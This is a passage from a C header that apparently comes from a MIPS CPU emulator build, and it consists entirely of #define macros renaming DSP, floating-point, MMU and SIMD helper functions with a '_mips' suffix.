helper_precrq_rs_qh_pw helper_precrq_rs_qh_pw_mips #define helper_precrq_pw_l helper_precrq_pw_l_mips #define helper_precrqu_s_qb_ph helper_precrqu_s_qb_ph_mips #define helper_precrqu_s_ob_qh helper_precrqu_s_ob_qh_mips #define helper_preceq_pw_qhl helper_preceq_pw_qhl_mips #define helper_preceq_pw_qhr helper_preceq_pw_qhr_mips #define helper_preceq_pw_qhla helper_preceq_pw_qhla_mips #define helper_preceq_pw_qhra helper_preceq_pw_qhra_mips #define helper_precequ_ph_qbl helper_precequ_ph_qbl_mips #define helper_precequ_ph_qbr helper_precequ_ph_qbr_mips #define helper_precequ_ph_qbla helper_precequ_ph_qbla_mips #define helper_precequ_ph_qbra helper_precequ_ph_qbra_mips #define helper_precequ_qh_obl helper_precequ_qh_obl_mips #define helper_precequ_qh_obr helper_precequ_qh_obr_mips #define helper_precequ_qh_obla helper_precequ_qh_obla_mips #define helper_precequ_qh_obra helper_precequ_qh_obra_mips #define helper_preceu_ph_qbl helper_preceu_ph_qbl_mips #define helper_preceu_ph_qbr helper_preceu_ph_qbr_mips #define helper_preceu_ph_qbla helper_preceu_ph_qbla_mips #define helper_preceu_ph_qbra helper_preceu_ph_qbra_mips #define helper_preceu_qh_obl helper_preceu_qh_obl_mips #define helper_preceu_qh_obr helper_preceu_qh_obr_mips #define helper_preceu_qh_obla helper_preceu_qh_obla_mips #define helper_preceu_qh_obra helper_preceu_qh_obra_mips #define helper_shll_qb helper_shll_qb_mips #define helper_shrl_qb helper_shrl_qb_mips #define helper_shra_qb helper_shra_qb_mips #define helper_shra_r_qb helper_shra_r_qb_mips #define helper_shll_ob helper_shll_ob_mips #define helper_shrl_ob helper_shrl_ob_mips #define helper_shra_ob helper_shra_ob_mips #define helper_shra_r_ob helper_shra_r_ob_mips #define helper_shll_ph helper_shll_ph_mips #define helper_shll_s_ph helper_shll_s_ph_mips #define helper_shll_qh helper_shll_qh_mips #define helper_shll_s_qh helper_shll_s_qh_mips #define helper_shrl_qh helper_shrl_qh_mips #define helper_shra_qh helper_shra_qh_mips #define helper_shra_r_qh helper_shra_r_qh_mips #define helper_shll_s_w helper_shll_s_w_mips #define helper_shra_r_w helper_shra_r_w_mips #define helper_shll_pw helper_shll_pw_mips #define helper_shll_s_pw helper_shll_s_pw_mips #define helper_shra_pw helper_shra_pw_mips #define helper_shra_r_pw helper_shra_r_pw_mips #define helper_shrl_ph helper_shrl_ph_mips #define helper_shra_ph helper_shra_ph_mips #define helper_shra_r_ph helper_shra_r_ph_mips #define helper_muleu_s_ph_qbl helper_muleu_s_ph_qbl_mips #define helper_muleu_s_ph_qbr helper_muleu_s_ph_qbr_mips #define helper_mulq_rs_ph helper_mulq_rs_ph_mips #define helper_mul_ph helper_mul_ph_mips #define helper_mul_s_ph helper_mul_s_ph_mips #define helper_mulq_s_ph helper_mulq_s_ph_mips #define helper_muleq_s_w_phl helper_muleq_s_w_phl_mips #define helper_muleq_s_w_phr helper_muleq_s_w_phr_mips #define helper_mulsaq_s_w_ph helper_mulsaq_s_w_ph_mips #define helper_mulsa_w_ph helper_mulsa_w_ph_mips #define helper_muleu_s_qh_obl helper_muleu_s_qh_obl_mips #define helper_muleu_s_qh_obr helper_muleu_s_qh_obr_mips #define helper_mulq_rs_qh helper_mulq_rs_qh_mips #define helper_muleq_s_pw_qhl helper_muleq_s_pw_qhl_mips #define helper_muleq_s_pw_qhr helper_muleq_s_pw_qhr_mips #define helper_mulsaq_s_w_qh helper_mulsaq_s_w_qh_mips #define helper_dpau_h_qbl helper_dpau_h_qbl_mips #define helper_dpau_h_qbr helper_dpau_h_qbr_mips #define helper_dpsu_h_qbl helper_dpsu_h_qbl_mips #define helper_dpsu_h_qbr helper_dpsu_h_qbr_mips #define helper_dpau_h_obl helper_dpau_h_obl_mips #define helper_dpau_h_obr helper_dpau_h_obr_mips #define helper_dpsu_h_obl helper_dpsu_h_obl_mips #define helper_dpsu_h_obr helper_dpsu_h_obr_mips #define helper_dpa_w_ph helper_dpa_w_ph_mips #define helper_dpax_w_ph helper_dpax_w_ph_mips #define helper_dps_w_ph helper_dps_w_ph_mips #define helper_dpsx_w_ph helper_dpsx_w_ph_mips #define helper_dpaq_s_w_ph helper_dpaq_s_w_ph_mips #define helper_dpaqx_s_w_ph helper_dpaqx_s_w_ph_mips #define helper_dpsq_s_w_ph helper_dpsq_s_w_ph_mips #define helper_dpsqx_s_w_ph helper_dpsqx_s_w_ph_mips #define helper_dpaqx_sa_w_ph helper_dpaqx_sa_w_ph_mips #define helper_dpsqx_sa_w_ph helper_dpsqx_sa_w_ph_mips #define helper_dpa_w_qh helper_dpa_w_qh_mips #define helper_dpaq_s_w_qh helper_dpaq_s_w_qh_mips #define helper_dps_w_qh helper_dps_w_qh_mips #define helper_dpsq_s_w_qh helper_dpsq_s_w_qh_mips #define helper_dpaq_sa_l_w helper_dpaq_sa_l_w_mips #define helper_dpsq_sa_l_w helper_dpsq_sa_l_w_mips #define helper_dpaq_sa_l_pw helper_dpaq_sa_l_pw_mips #define helper_dpsq_sa_l_pw helper_dpsq_sa_l_pw_mips #define helper_mulsaq_s_l_pw helper_mulsaq_s_l_pw_mips #define helper_maq_s_w_phl helper_maq_s_w_phl_mips #define helper_maq_s_w_phr helper_maq_s_w_phr_mips #define helper_maq_sa_w_phl helper_maq_sa_w_phl_mips #define helper_maq_sa_w_phr helper_maq_sa_w_phr_mips #define helper_mulq_s_w helper_mulq_s_w_mips #define helper_mulq_rs_w helper_mulq_rs_w_mips #define helper_maq_s_w_qhll helper_maq_s_w_qhll_mips #define helper_maq_s_w_qhlr helper_maq_s_w_qhlr_mips #define helper_maq_s_w_qhrl helper_maq_s_w_qhrl_mips #define helper_maq_s_w_qhrr helper_maq_s_w_qhrr_mips #define helper_maq_sa_w_qhll helper_maq_sa_w_qhll_mips #define helper_maq_sa_w_qhlr helper_maq_sa_w_qhlr_mips #define helper_maq_sa_w_qhrl helper_maq_sa_w_qhrl_mips #define helper_maq_sa_w_qhrr helper_maq_sa_w_qhrr_mips #define helper_maq_s_l_pwl helper_maq_s_l_pwl_mips #define helper_maq_s_l_pwr helper_maq_s_l_pwr_mips #define helper_dmadd helper_dmadd_mips #define helper_dmaddu helper_dmaddu_mips #define helper_dmsub helper_dmsub_mips #define helper_dmsubu helper_dmsubu_mips #define helper_bitrev helper_bitrev_mips #define helper_insv helper_insv_mips #define helper_dinsv helper_dinsv_mips #define helper_cmpgu_eq_qb helper_cmpgu_eq_qb_mips #define helper_cmpgu_lt_qb helper_cmpgu_lt_qb_mips #define helper_cmpgu_le_qb helper_cmpgu_le_qb_mips #define helper_cmpgu_eq_ob helper_cmpgu_eq_ob_mips #define helper_cmpgu_lt_ob helper_cmpgu_lt_ob_mips #define helper_cmpgu_le_ob helper_cmpgu_le_ob_mips #define helper_cmpu_eq_qb helper_cmpu_eq_qb_mips #define helper_cmpu_lt_qb helper_cmpu_lt_qb_mips #define helper_cmpu_le_qb helper_cmpu_le_qb_mips #define helper_cmp_eq_ph helper_cmp_eq_ph_mips #define helper_cmp_lt_ph helper_cmp_lt_ph_mips #define helper_cmp_le_ph helper_cmp_le_ph_mips #define helper_cmpu_eq_ob helper_cmpu_eq_ob_mips #define helper_cmpu_lt_ob helper_cmpu_lt_ob_mips #define helper_cmpu_le_ob helper_cmpu_le_ob_mips #define helper_cmp_eq_qh helper_cmp_eq_qh_mips #define helper_cmp_lt_qh helper_cmp_lt_qh_mips #define helper_cmp_le_qh helper_cmp_le_qh_mips #define helper_cmp_eq_pw helper_cmp_eq_pw_mips #define helper_cmp_lt_pw helper_cmp_lt_pw_mips #define helper_cmp_le_pw helper_cmp_le_pw_mips #define helper_cmpgdu_eq_ob helper_cmpgdu_eq_ob_mips #define helper_cmpgdu_lt_ob helper_cmpgdu_lt_ob_mips #define helper_cmpgdu_le_ob helper_cmpgdu_le_ob_mips #define helper_pick_qb helper_pick_qb_mips #define helper_pick_ph helper_pick_ph_mips #define helper_pick_ob helper_pick_ob_mips #define helper_pick_qh helper_pick_qh_mips #define helper_pick_pw helper_pick_pw_mips #define helper_packrl_ph helper_packrl_ph_mips #define helper_packrl_pw helper_packrl_pw_mips #define helper_extr_w helper_extr_w_mips #define helper_extr_r_w helper_extr_r_w_mips #define helper_extr_rs_w helper_extr_rs_w_mips #define helper_dextr_w helper_dextr_w_mips #define helper_dextr_r_w helper_dextr_r_w_mips #define helper_dextr_rs_w helper_dextr_rs_w_mips #define helper_dextr_l helper_dextr_l_mips #define helper_dextr_r_l helper_dextr_r_l_mips #define helper_dextr_rs_l helper_dextr_rs_l_mips #define helper_extr_s_h helper_extr_s_h_mips #define helper_dextr_s_h helper_dextr_s_h_mips #define helper_extp helper_extp_mips #define helper_extpdp helper_extpdp_mips #define helper_dextp helper_dextp_mips #define helper_dextpdp helper_dextpdp_mips #define helper_shilo helper_shilo_mips #define helper_dshilo helper_dshilo_mips #define helper_mthlip helper_mthlip_mips #define helper_dmthlip helper_dmthlip_mips #define cpu_wrdsp cpu_wrdsp_mips #define helper_wrdsp helper_wrdsp_mips #define cpu_rddsp cpu_rddsp_mips #define helper_rddsp helper_rddsp_mips #define helper_cfc1 helper_cfc1_mips #define helper_ctc1 helper_ctc1_mips #define ieee_ex_to_mips ieee_ex_to_mips_mips #define helper_float_sqrt_d helper_float_sqrt_d_mips #define helper_float_sqrt_s helper_float_sqrt_s_mips #define helper_float_cvtd_s helper_float_cvtd_s_mips #define helper_float_cvtd_w helper_float_cvtd_w_mips #define helper_float_cvtd_l helper_float_cvtd_l_mips #define helper_float_cvt_l_d helper_float_cvt_l_d_mips #define helper_float_cvt_l_s helper_float_cvt_l_s_mips #define helper_float_cvtps_pw helper_float_cvtps_pw_mips #define helper_float_cvtpw_ps helper_float_cvtpw_ps_mips #define helper_float_cvts_d helper_float_cvts_d_mips #define helper_float_cvts_w helper_float_cvts_w_mips #define helper_float_cvts_l helper_float_cvts_l_mips #define helper_float_cvts_pl helper_float_cvts_pl_mips #define helper_float_cvts_pu helper_float_cvts_pu_mips #define helper_float_cvt_w_s helper_float_cvt_w_s_mips #define helper_float_cvt_w_d helper_float_cvt_w_d_mips #define helper_float_round_l_d helper_float_round_l_d_mips #define helper_float_round_l_s helper_float_round_l_s_mips #define helper_float_round_w_d helper_float_round_w_d_mips #define helper_float_round_w_s helper_float_round_w_s_mips #define helper_float_trunc_l_d helper_float_trunc_l_d_mips #define helper_float_trunc_l_s helper_float_trunc_l_s_mips #define helper_float_trunc_w_d helper_float_trunc_w_d_mips #define helper_float_trunc_w_s helper_float_trunc_w_s_mips #define helper_float_ceil_l_d helper_float_ceil_l_d_mips #define helper_float_ceil_l_s helper_float_ceil_l_s_mips #define helper_float_ceil_w_d helper_float_ceil_w_d_mips #define helper_float_ceil_w_s helper_float_ceil_w_s_mips #define helper_float_floor_l_d helper_float_floor_l_d_mips #define helper_float_floor_l_s helper_float_floor_l_s_mips #define helper_float_floor_w_d helper_float_floor_w_d_mips #define helper_float_floor_w_s helper_float_floor_w_s_mips #define helper_float_cvt_2008_l_d helper_float_cvt_2008_l_d_mips #define helper_float_cvt_2008_l_s helper_float_cvt_2008_l_s_mips #define helper_float_cvt_2008_w_d helper_float_cvt_2008_w_d_mips #define helper_float_cvt_2008_w_s helper_float_cvt_2008_w_s_mips #define helper_float_round_2008_l_d helper_float_round_2008_l_d_mips #define helper_float_round_2008_l_s helper_float_round_2008_l_s_mips #define helper_float_round_2008_w_d helper_float_round_2008_w_d_mips #define helper_float_round_2008_w_s helper_float_round_2008_w_s_mips #define helper_float_trunc_2008_l_d helper_float_trunc_2008_l_d_mips #define helper_float_trunc_2008_l_s helper_float_trunc_2008_l_s_mips #define helper_float_trunc_2008_w_d helper_float_trunc_2008_w_d_mips #define helper_float_trunc_2008_w_s helper_float_trunc_2008_w_s_mips #define helper_float_ceil_2008_l_d helper_float_ceil_2008_l_d_mips #define helper_float_ceil_2008_l_s helper_float_ceil_2008_l_s_mips #define helper_float_ceil_2008_w_d helper_float_ceil_2008_w_d_mips #define helper_float_ceil_2008_w_s helper_float_ceil_2008_w_s_mips #define helper_float_floor_2008_l_d helper_float_floor_2008_l_d_mips #define helper_float_floor_2008_l_s helper_float_floor_2008_l_s_mips #define helper_float_floor_2008_w_d helper_float_floor_2008_w_d_mips #define helper_float_floor_2008_w_s helper_float_floor_2008_w_s_mips #define helper_float_abs_d helper_float_abs_d_mips #define helper_float_abs_s helper_float_abs_s_mips #define helper_float_abs_ps helper_float_abs_ps_mips #define helper_float_chs_d helper_float_chs_d_mips #define helper_float_chs_s helper_float_chs_s_mips #define helper_float_chs_ps helper_float_chs_ps_mips #define helper_float_recip_d helper_float_recip_d_mips #define helper_float_recip_s helper_float_recip_s_mips #define helper_float_rsqrt_d helper_float_rsqrt_d_mips #define helper_float_rsqrt_s helper_float_rsqrt_s_mips #define helper_float_recip1_d helper_float_recip1_d_mips #define helper_float_recip1_s helper_float_recip1_s_mips #define helper_float_recip1_ps helper_float_recip1_ps_mips #define helper_float_rsqrt1_d helper_float_rsqrt1_d_mips #define helper_float_rsqrt1_s helper_float_rsqrt1_s_mips #define helper_float_rsqrt1_ps helper_float_rsqrt1_ps_mips #define helper_float_rint_s helper_float_rint_s_mips #define helper_float_rint_d helper_float_rint_d_mips #define float_class_s float_class_s_mips #define helper_float_class_s helper_float_class_s_mips #define float_class_d float_class_d_mips #define helper_float_class_d helper_float_class_d_mips #define helper_float_add_d helper_float_add_d_mips #define helper_float_add_s helper_float_add_s_mips #define helper_float_add_ps helper_float_add_ps_mips #define helper_float_sub_d helper_float_sub_d_mips #define helper_float_sub_s helper_float_sub_s_mips #define helper_float_sub_ps helper_float_sub_ps_mips #define helper_float_mul_d helper_float_mul_d_mips #define helper_float_mul_s helper_float_mul_s_mips #define helper_float_mul_ps helper_float_mul_ps_mips #define helper_float_div_d helper_float_div_d_mips #define helper_float_div_s helper_float_div_s_mips #define helper_float_div_ps helper_float_div_ps_mips #define helper_float_recip2_d helper_float_recip2_d_mips #define helper_float_recip2_s helper_float_recip2_s_mips #define helper_float_recip2_ps helper_float_recip2_ps_mips #define helper_float_rsqrt2_d helper_float_rsqrt2_d_mips #define helper_float_rsqrt2_s helper_float_rsqrt2_s_mips #define helper_float_rsqrt2_ps helper_float_rsqrt2_ps_mips #define helper_float_addr_ps helper_float_addr_ps_mips #define helper_float_mulr_ps helper_float_mulr_ps_mips #define helper_float_max_s helper_float_max_s_mips #define helper_float_max_d helper_float_max_d_mips #define helper_float_maxa_s helper_float_maxa_s_mips #define helper_float_maxa_d helper_float_maxa_d_mips #define helper_float_min_s helper_float_min_s_mips #define helper_float_min_d helper_float_min_d_mips #define helper_float_mina_s helper_float_mina_s_mips #define helper_float_mina_d helper_float_mina_d_mips #define helper_float_madd_d helper_float_madd_d_mips #define helper_float_madd_s helper_float_madd_s_mips #define helper_float_madd_ps helper_float_madd_ps_mips #define helper_float_msub_d helper_float_msub_d_mips #define helper_float_msub_s helper_float_msub_s_mips #define helper_float_msub_ps helper_float_msub_ps_mips #define helper_float_nmadd_d helper_float_nmadd_d_mips #define helper_float_nmadd_s helper_float_nmadd_s_mips #define helper_float_nmadd_ps helper_float_nmadd_ps_mips #define helper_float_nmsub_d helper_float_nmsub_d_mips #define helper_float_nmsub_s helper_float_nmsub_s_mips #define helper_float_nmsub_ps helper_float_nmsub_ps_mips #define helper_float_maddf_s helper_float_maddf_s_mips #define helper_float_maddf_d helper_float_maddf_d_mips #define helper_float_msubf_s helper_float_msubf_s_mips #define helper_float_msubf_d helper_float_msubf_d_mips #define helper_cmp_d_f helper_cmp_d_f_mips #define helper_cmpabs_d_f helper_cmpabs_d_f_mips #define helper_cmp_d_un helper_cmp_d_un_mips #define helper_cmpabs_d_un helper_cmpabs_d_un_mips #define helper_cmp_d_eq helper_cmp_d_eq_mips #define helper_cmpabs_d_eq helper_cmpabs_d_eq_mips #define helper_cmp_d_ueq helper_cmp_d_ueq_mips #define helper_cmpabs_d_ueq helper_cmpabs_d_ueq_mips #define helper_cmp_d_olt helper_cmp_d_olt_mips #define helper_cmpabs_d_olt helper_cmpabs_d_olt_mips #define helper_cmp_d_ult helper_cmp_d_ult_mips #define helper_cmpabs_d_ult helper_cmpabs_d_ult_mips #define helper_cmp_d_ole helper_cmp_d_ole_mips #define helper_cmpabs_d_ole helper_cmpabs_d_ole_mips #define helper_cmp_d_ule helper_cmp_d_ule_mips #define helper_cmpabs_d_ule helper_cmpabs_d_ule_mips #define helper_cmp_d_sf helper_cmp_d_sf_mips #define helper_cmpabs_d_sf helper_cmpabs_d_sf_mips #define helper_cmp_d_ngle helper_cmp_d_ngle_mips #define helper_cmpabs_d_ngle helper_cmpabs_d_ngle_mips #define helper_cmp_d_seq helper_cmp_d_seq_mips #define helper_cmpabs_d_seq helper_cmpabs_d_seq_mips #define helper_cmp_d_ngl helper_cmp_d_ngl_mips #define helper_cmpabs_d_ngl helper_cmpabs_d_ngl_mips #define helper_cmp_d_lt helper_cmp_d_lt_mips #define helper_cmpabs_d_lt helper_cmpabs_d_lt_mips #define helper_cmp_d_nge helper_cmp_d_nge_mips #define helper_cmpabs_d_nge helper_cmpabs_d_nge_mips #define helper_cmp_d_le helper_cmp_d_le_mips #define helper_cmpabs_d_le helper_cmpabs_d_le_mips #define helper_cmp_d_ngt helper_cmp_d_ngt_mips #define helper_cmpabs_d_ngt helper_cmpabs_d_ngt_mips #define helper_cmp_s_f helper_cmp_s_f_mips #define helper_cmpabs_s_f helper_cmpabs_s_f_mips #define helper_cmp_s_un helper_cmp_s_un_mips #define helper_cmpabs_s_un helper_cmpabs_s_un_mips #define helper_cmp_s_eq helper_cmp_s_eq_mips #define helper_cmpabs_s_eq helper_cmpabs_s_eq_mips #define helper_cmp_s_ueq helper_cmp_s_ueq_mips #define helper_cmpabs_s_ueq helper_cmpabs_s_ueq_mips #define helper_cmp_s_olt helper_cmp_s_olt_mips #define helper_cmpabs_s_olt helper_cmpabs_s_olt_mips #define helper_cmp_s_ult helper_cmp_s_ult_mips #define helper_cmpabs_s_ult helper_cmpabs_s_ult_mips #define helper_cmp_s_ole helper_cmp_s_ole_mips #define helper_cmpabs_s_ole helper_cmpabs_s_ole_mips #define helper_cmp_s_ule helper_cmp_s_ule_mips #define helper_cmpabs_s_ule helper_cmpabs_s_ule_mips #define helper_cmp_s_sf helper_cmp_s_sf_mips #define helper_cmpabs_s_sf helper_cmpabs_s_sf_mips #define helper_cmp_s_ngle helper_cmp_s_ngle_mips #define helper_cmpabs_s_ngle helper_cmpabs_s_ngle_mips #define helper_cmp_s_seq helper_cmp_s_seq_mips #define helper_cmpabs_s_seq helper_cmpabs_s_seq_mips #define helper_cmp_s_ngl helper_cmp_s_ngl_mips #define helper_cmpabs_s_ngl helper_cmpabs_s_ngl_mips #define helper_cmp_s_lt helper_cmp_s_lt_mips #define helper_cmpabs_s_lt helper_cmpabs_s_lt_mips #define helper_cmp_s_nge helper_cmp_s_nge_mips #define helper_cmpabs_s_nge helper_cmpabs_s_nge_mips #define helper_cmp_s_le helper_cmp_s_le_mips #define helper_cmpabs_s_le helper_cmpabs_s_le_mips #define helper_cmp_s_ngt helper_cmp_s_ngt_mips #define helper_cmpabs_s_ngt helper_cmpabs_s_ngt_mips #define helper_cmp_ps_f helper_cmp_ps_f_mips #define helper_cmpabs_ps_f helper_cmpabs_ps_f_mips #define helper_cmp_ps_un helper_cmp_ps_un_mips #define helper_cmpabs_ps_un helper_cmpabs_ps_un_mips #define helper_cmp_ps_eq helper_cmp_ps_eq_mips #define helper_cmpabs_ps_eq helper_cmpabs_ps_eq_mips #define helper_cmp_ps_ueq helper_cmp_ps_ueq_mips #define helper_cmpabs_ps_ueq helper_cmpabs_ps_ueq_mips #define helper_cmp_ps_olt helper_cmp_ps_olt_mips #define helper_cmpabs_ps_olt helper_cmpabs_ps_olt_mips #define helper_cmp_ps_ult helper_cmp_ps_ult_mips #define helper_cmpabs_ps_ult helper_cmpabs_ps_ult_mips #define helper_cmp_ps_ole helper_cmp_ps_ole_mips #define helper_cmpabs_ps_ole helper_cmpabs_ps_ole_mips #define helper_cmp_ps_ule helper_cmp_ps_ule_mips #define helper_cmpabs_ps_ule helper_cmpabs_ps_ule_mips #define helper_cmp_ps_sf helper_cmp_ps_sf_mips #define helper_cmpabs_ps_sf helper_cmpabs_ps_sf_mips #define helper_cmp_ps_ngle helper_cmp_ps_ngle_mips #define helper_cmpabs_ps_ngle helper_cmpabs_ps_ngle_mips #define helper_cmp_ps_seq helper_cmp_ps_seq_mips #define helper_cmpabs_ps_seq helper_cmpabs_ps_seq_mips #define helper_cmp_ps_ngl helper_cmp_ps_ngl_mips #define helper_cmpabs_ps_ngl helper_cmpabs_ps_ngl_mips #define helper_cmp_ps_lt helper_cmp_ps_lt_mips #define helper_cmpabs_ps_lt helper_cmpabs_ps_lt_mips #define helper_cmp_ps_nge helper_cmp_ps_nge_mips #define helper_cmpabs_ps_nge helper_cmpabs_ps_nge_mips #define helper_cmp_ps_le helper_cmp_ps_le_mips #define helper_cmpabs_ps_le helper_cmpabs_ps_le_mips #define helper_cmp_ps_ngt helper_cmp_ps_ngt_mips #define helper_cmpabs_ps_ngt helper_cmpabs_ps_ngt_mips #define helper_r6_cmp_d_af helper_r6_cmp_d_af_mips #define helper_r6_cmp_d_un helper_r6_cmp_d_un_mips #define helper_r6_cmp_d_eq helper_r6_cmp_d_eq_mips #define helper_r6_cmp_d_ueq helper_r6_cmp_d_ueq_mips #define helper_r6_cmp_d_lt helper_r6_cmp_d_lt_mips #define helper_r6_cmp_d_ult helper_r6_cmp_d_ult_mips #define helper_r6_cmp_d_le helper_r6_cmp_d_le_mips #define helper_r6_cmp_d_ule helper_r6_cmp_d_ule_mips #define helper_r6_cmp_d_saf helper_r6_cmp_d_saf_mips #define helper_r6_cmp_d_sun helper_r6_cmp_d_sun_mips #define helper_r6_cmp_d_seq helper_r6_cmp_d_seq_mips #define helper_r6_cmp_d_sueq helper_r6_cmp_d_sueq_mips #define helper_r6_cmp_d_slt helper_r6_cmp_d_slt_mips #define helper_r6_cmp_d_sult helper_r6_cmp_d_sult_mips #define helper_r6_cmp_d_sle helper_r6_cmp_d_sle_mips #define helper_r6_cmp_d_sule helper_r6_cmp_d_sule_mips #define helper_r6_cmp_d_or helper_r6_cmp_d_or_mips #define helper_r6_cmp_d_une helper_r6_cmp_d_une_mips #define helper_r6_cmp_d_ne helper_r6_cmp_d_ne_mips #define helper_r6_cmp_d_sor helper_r6_cmp_d_sor_mips #define helper_r6_cmp_d_sune helper_r6_cmp_d_sune_mips #define helper_r6_cmp_d_sne helper_r6_cmp_d_sne_mips #define helper_r6_cmp_s_af helper_r6_cmp_s_af_mips #define helper_r6_cmp_s_un helper_r6_cmp_s_un_mips #define helper_r6_cmp_s_eq helper_r6_cmp_s_eq_mips #define helper_r6_cmp_s_ueq helper_r6_cmp_s_ueq_mips #define helper_r6_cmp_s_lt helper_r6_cmp_s_lt_mips #define helper_r6_cmp_s_ult helper_r6_cmp_s_ult_mips #define helper_r6_cmp_s_le helper_r6_cmp_s_le_mips #define helper_r6_cmp_s_ule helper_r6_cmp_s_ule_mips #define helper_r6_cmp_s_saf helper_r6_cmp_s_saf_mips #define helper_r6_cmp_s_sun helper_r6_cmp_s_sun_mips #define helper_r6_cmp_s_seq helper_r6_cmp_s_seq_mips #define helper_r6_cmp_s_sueq helper_r6_cmp_s_sueq_mips #define helper_r6_cmp_s_slt helper_r6_cmp_s_slt_mips #define helper_r6_cmp_s_sult helper_r6_cmp_s_sult_mips #define helper_r6_cmp_s_sle helper_r6_cmp_s_sle_mips #define helper_r6_cmp_s_sule helper_r6_cmp_s_sule_mips #define helper_r6_cmp_s_or helper_r6_cmp_s_or_mips #define helper_r6_cmp_s_une helper_r6_cmp_s_une_mips #define helper_r6_cmp_s_ne helper_r6_cmp_s_ne_mips #define helper_r6_cmp_s_sor helper_r6_cmp_s_sor_mips #define helper_r6_cmp_s_sune helper_r6_cmp_s_sune_mips #define helper_r6_cmp_s_sne helper_r6_cmp_s_sne_mips #define no_mmu_map_address no_mmu_map_address_mips #define fixed_mmu_map_address fixed_mmu_map_address_mips #define r4k_map_address r4k_map_address_mips #define cpu_mips_tlb_flush cpu_mips_tlb_flush_mips #define sync_c0_status sync_c0_status_mips #define cpu_mips_store_status cpu_mips_store_status_mips #define cpu_mips_store_cause cpu_mips_store_cause_mips #define mips_cpu_get_phys_page_debug mips_cpu_get_phys_page_debug_mips #define mips_cpu_tlb_fill mips_cpu_tlb_fill_mips #define cpu_mips_translate_address cpu_mips_translate_address_mips #define exception_resume_pc exception_resume_pc_mips #define mips_cpu_do_interrupt mips_cpu_do_interrupt_mips #define mips_cpu_exec_interrupt mips_cpu_exec_interrupt_mips #define r4k_invalidate_tlb r4k_invalidate_tlb_mips #define do_raise_exception_err do_raise_exception_err_mips #define helper_paddsb helper_paddsb_mips #define helper_paddusb helper_paddusb_mips #define helper_paddsh helper_paddsh_mips #define helper_paddush helper_paddush_mips #define helper_paddb helper_paddb_mips #define helper_paddh helper_paddh_mips #define helper_paddw helper_paddw_mips #define helper_psubsb helper_psubsb_mips #define helper_psubusb helper_psubusb_mips #define helper_psubsh helper_psubsh_mips #define helper_psubush helper_psubush_mips #define helper_psubb helper_psubb_mips #define helper_psubh helper_psubh_mips #define helper_psubw helper_psubw_mips #define helper_pshufh helper_pshufh_mips #define helper_packsswh helper_packsswh_mips #define helper_packsshb helper_packsshb_mips #define helper_packushb helper_packushb_mips #define helper_punpcklwd helper_punpcklwd_mips #define helper_punpckhwd helper_punpckhwd_mips #define helper_punpcklhw helper_punpcklhw_mips #define helper_punpckhhw helper_punpckhhw_mips #define helper_punpcklbh helper_punpcklbh_mips #define helper_punpckhbh helper_punpckhbh_mips #define helper_pavgh helper_pavgh_mips #define helper_pavgb helper_pavgb_mips #define helper_pmaxsh helper_pmaxsh_mips #define helper_pminsh helper_pminsh_mips #define helper_pmaxub helper_pmaxub_mips #define helper_pminub helper_pminub_mips #define helper_pcmpeqw helper_pcmpeqw_mips #define helper_pcmpgtw helper_pcmpgtw_mips #define helper_pcmpeqh helper_pcmpeqh_mips #define helper_pcmpgth helper_pcmpgth_mips #define helper_pcmpeqb helper_pcmpeqb_mips #define helper_pcmpgtb helper_pcmpgtb_mips #define helper_psllw helper_psllw_mips #define helper_psrlw helper_psrlw_mips #define helper_psraw helper_psraw_mips #define helper_psllh helper_psllh_mips #define helper_psrlh helper_psrlh_mips #define helper_psrah helper_psrah_mips #define helper_pmullh helper_pmullh_mips #define helper_pmulhh helper_pmulhh_mips #define helper_pmulhuh helper_pmulhuh_mips #define helper_pmaddhw helper_pmaddhw_mips #define helper_pasubub helper_pasubub_mips #define helper_biadd helper_biadd_mips #define helper_pmovmskb helper_pmovmskb_mips #define helper_msa_nloc_b helper_msa_nloc_b_mips #define helper_msa_nloc_h helper_msa_nloc_h_mips #define helper_msa_nloc_w helper_msa_nloc_w_mips #define helper_msa_nloc_d helper_msa_nloc_d_mips #define helper_msa_nlzc_b helper_msa_nlzc_b_mips #define helper_msa_nlzc_h helper_msa_nlzc_h_mips #define helper_msa_nlzc_w helper_msa_nlzc_w_mips #define helper_msa_nlzc_d helper_msa_nlzc_d_mips #define helper_msa_pcnt_b helper_msa_pcnt_b_mips #define helper_msa_pcnt_h helper_msa_pcnt_h_mips #define helper_msa_pcnt_w helper_msa_pcnt_w_mips #define helper_msa_pcnt_d helper_msa_pcnt_d_mips #define helper_msa_binsl_b helper_msa_binsl_b_mips #define helper_msa_binsl_h helper_msa_binsl_h_mips #define helper_msa_binsl_w helper_msa_binsl_w_mips #define helper_msa_binsl_d helper_msa_binsl_d_mips #define helper_msa_binsr_b helper_msa_binsr_b_mips #define helper_msa_binsr_h helper_msa_binsr_h_mips #define helper_msa_binsr_w helper_msa_binsr_w_mips #define helper_msa_binsr_d helper_msa_binsr_d_mips #define helper_msa_bmnz_v helper_msa_bmnz_v_mips #define helper_msa_bmz_v helper_msa_bmz_v_mips #define helper_msa_bsel_v helper_msa_bsel_v_mips #define helper_msa_bclr_b helper_msa_bclr_b_mips #define helper_msa_bclr_h helper_msa_bclr_h_mips #define helper_msa_bclr_w helper_msa_bclr_w_mips #define helper_msa_bclr_d helper_msa_bclr_d_mips #define helper_msa_bneg_b helper_msa_bneg_b_mips #define helper_msa_bneg_h helper_msa_bneg_h_mips #define helper_msa_bneg_w helper_msa_bneg_w_mips #define helper_msa_bneg_d helper_msa_bneg_d_mips #define helper_msa_bset_b helper_msa_bset_b_mips #define helper_msa_bset_h helper_msa_bset_h_mips #define helper_msa_bset_w helper_msa_bset_w_mips #define helper_msa_bset_d helper_msa_bset_d_mips #define helper_msa_add_a_b helper_msa_add_a_b_mips #define helper_msa_add_a_h helper_msa_add_a_h_mips #define helper_msa_add_a_w helper_msa_add_a_w_mips #define helper_msa_add_a_d helper_msa_add_a_d_mips #define helper_msa_adds_a_b helper_msa_adds_a_b_mips #define helper_msa_adds_a_h helper_msa_adds_a_h_mips #define helper_msa_adds_a_w helper_msa_adds_a_w_mips #define helper_msa_adds_a_d helper_msa_adds_a_d_mips #define helper_msa_adds_s_b helper_msa_adds_s_b_mips #define helper_msa_adds_s_h helper_msa_adds_s_h_mips #define helper_msa_adds_s_w helper_msa_adds_s_w_mips #define helper_msa_adds_s_d helper_msa_adds_s_d_mips #define helper_msa_adds_u_b helper_msa_adds_u_b_mips #define helper_msa_adds_u_h helper_msa_adds_u_h_mips #define helper_msa_adds_u_w helper_msa_adds_u_w_mips #define helper_msa_adds_u_d helper_msa_adds_u_d_mips #define helper_msa_addv_b helper_msa_addv_b_mips #define 